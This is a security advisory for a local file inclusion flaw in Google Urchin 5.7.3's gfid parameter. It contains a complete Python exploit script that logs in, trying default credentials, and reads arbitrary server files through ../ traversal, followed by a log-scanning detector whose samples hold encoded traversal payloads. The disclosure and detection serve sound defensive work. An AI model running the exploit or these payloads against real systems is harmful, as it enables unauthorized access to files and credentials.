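Affected systems:
Urchin Urchin Software Urchin 5.7.3
Description:
BUGTRAQ ID: 45393
Google Urchin is a hybrid solution that uses JavaScript tags and server log files, which lets it add detailed information to its reports and keep all information on the server.
Google Urchin has an input validation vulnerability in its implementation. An attacker can exploit it to obtain sensitive information, execute arbitrary local scripts in the web server process, and take control of the application and the computer.
<*Source: Kristian Erik Hermansen (kristian.hermansen@gmail.com)
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!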
#!/usr/bin/env python
# Author: "Kristian Erik Hermansen" <kristian.hermansen@gmail.com>
# Date: December 2010
# Google Urchin 5.x LFI in gfid parameter (0day)
# Python 2 script (httplib, print statement).
from sys import argv
import httplib, urllib

if len(argv) < 3:
    print 'usage: %s <host> <file> [port] [user] [pass]' % (argv[0])
    exit(1)
HOST = argv[1]
FILE = argv[2]
# Optional arguments fall back to the defaults when omitted.
PORT = int(argv[3]) if len(argv) > 3 else 9999
USER = argv[4] if len(argv) > 4 else 'admin'
PASS = argv[5] if len(argv) > 5 else 'urchin'

# Fetch the login page and read the hidden "app" field.
conn = httplib.HTTPConnection('%s:%d' % (HOST, PORT))
conn.request('GET', '/')
response = conn.getresponse()
if str(response.status)[0] == '3':
    print '[-] Host probably uses SSL. Not supported.'
    exit(2)
data = response.read()
app = data.split('<input type="hidden" name="app" value="')[1].split('"')[0]

# Log in to obtain a session id (sid) and a report id (rid).
params = urllib.urlencode({'user': USER, 'pass': PASS, 'app': app,
                           'action': 'login'})
conn.request('POST', '/session.cgi', params)
response = conn.getresponse()
data = response.read()
if data.find('Authentication Failed.') == -1:
    print '[*] Authentication succeeded :)'
else:
    print '[-] Authentication failed :('
    exit(3)
sid = data.split('?sid=')[1].split('&')[0]
rid = data.split('<a href="javascript:openReport(')[1].split(',')[0]

# admin.exe indicates a Windows host, so backslashes are used as separators.
if app == 'admin.exe':
    pad = '..\\' * 16
else:
    pad = '../' * 16

# The gfid parameter of the svg command is not validated.
conn.request('GET',
             '/session.cgi?sid=%s&action=prop&app=urchin.cgi&rid=%s&cmd=svg&gfid=%s%s&ie5=.svg'
             % (sid, rid, pad, FILE))
response = conn.getresponse()
data = response.read()
if data.find('SVG image not found. Possible causes are:') == -1:
    print data
else:
    print '[-] Failed to retrieve requested file. May not exist on host.'
conn.close()
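Recommendation:
Vendor patch:
Urchin
------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: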
http://www.roirevolution.com/urchin/
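
With no vendor fix available, requests that abuse the gfid parameter can at least be found in web logs. The following is an added example, not part of the original advisory or of Urchin itself: it flags /session.cgi requests whose gfid value contains directory traversal, including percent-encoded and double-encoded forms. The Common Log Format layout, the function names, and the sample entries (including the gfid value chart01) are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# "../" or "..\" once the value is decoded.
TRAVERSAL = re.compile(r"\.\.[/\\]")
# Request line inside a Common Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def gfid_traversal(target):
    """Return the decoded gfid value if it contains traversal, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/session.cgi"):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("gfid", []):
        # parse_qs decodes once; keep decoding to catch %252e-style nesting.
        for _ in range(3):
            if TRAVERSAL.search(value):
                return value
            value = unquote(value)
    return None


def scan(lines):
    """Return (line number, client address, decoded gfid) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = gfid_traversal(match.group(1)) if match else None
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits


# Constructed sample entries (documentation-range addresses, made-up values).
BASE = "/session.cgi?sid=1&action=prop&app=urchin.cgi&rid=3&cmd=svg&gfid="


def entry(client, gfid):
    return '{} - - [12/Dec/2010:10:01:02 +0000] "GET {}{}&ie5=.svg HTTP/1.1" 200 512'.format(
        client, BASE, gfid)


SAMPLE_LOG = [
    entry("192.0.2.10", "chart01"),
    entry("198.51.100.7", "../../../../somefile"),
    entry("198.51.100.7", "%2e%2e%2f%2e%2e%2fsomefile"),
    entry("203.0.113.5", "%252e%252e%255c%252e%252e%255csomefile"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d  client %s  gfid=%r" % hit)
```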